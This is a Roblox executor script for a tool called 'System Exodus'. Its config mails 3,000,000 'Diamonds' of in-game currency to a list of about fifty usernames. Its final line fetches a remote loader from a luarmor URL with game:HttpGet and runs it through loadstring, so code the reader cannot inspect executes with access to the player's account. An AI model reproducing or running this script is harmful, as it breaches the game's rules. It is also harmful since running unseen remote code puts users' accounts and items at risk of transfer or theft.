getgenv().Settings = {
    Mailing = {


        ["Diamonds"] = {Class = "Currency", Amount = 3000000},

    },
    Users = {
"Virtualgamer38nBw50",
"quantum_Blade2UGQTb",
"Solar_algorithm2V8KA",
"Syntheticsynth_9JnnL",
"Infra_rider4uO",
"pirate69fM",
"vapor_operator2IoFA",
"Synthetic_matrixTVL",
"dynamicDrone6C",
"zone24tWV0hOrZN2Y",
"robo9XRMdpv",
"robotic_gamerH",
"Electric_runner127yf",
"atomicOperatorVNJtf",
"quantum_blade82Xw",
"solarSystem66IFi",
"cyberSignal71EBlu8Y",
"Quantum_Bladei8",
"electro2VIPIz8",
"digitalUOQMV",
"cyber1Ptw",
"roboticwarden3vm",
"Modern_operator5cCnl",
"cyber_explorerfxJ",
"roboticvortex_11vUAH",
"Quantum6s",
"Neon_avatar7gK9",
"ExplorerH7k6k",
"nano_Circuit44zB",
"DigitaluZSKyXOa1O",
"solarGamer92NLm",
"atomicnetwork_9t",
"Glitchblade382UloKR",
"HyperDatasmm",
"infraGuardian4sc",
"AlgorithmV6jkkH",
"nanoVirus31n",
"Glitch_network41KIyG",
"dynamicWaveUDkALCyZi",
"dataGQWDCpCOsyYBsWBE",
"hyperwave7Ra",
"Quantumzone903g1yru",
"Electromatrix0y",
"syntheticRunner2H",
"quantum_ninja2B0Q",
"hyper41OP2QWG3",
"Shadow95z2n4u4LHh",
"Hyper2gYXM11MJyIZN8",
"cybernetic3SnOA",
"ElectroWardenAAc5rmz",
    },
    ["Split Items Evenly"] = false, --// False -> it will send the Amount per account.
    ["Only Online Accounts"] = false,

    [[ Thank you for using System Exodus <3! ]]
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/86847850c3165379f5be2d9d071eaccb.lua"))()
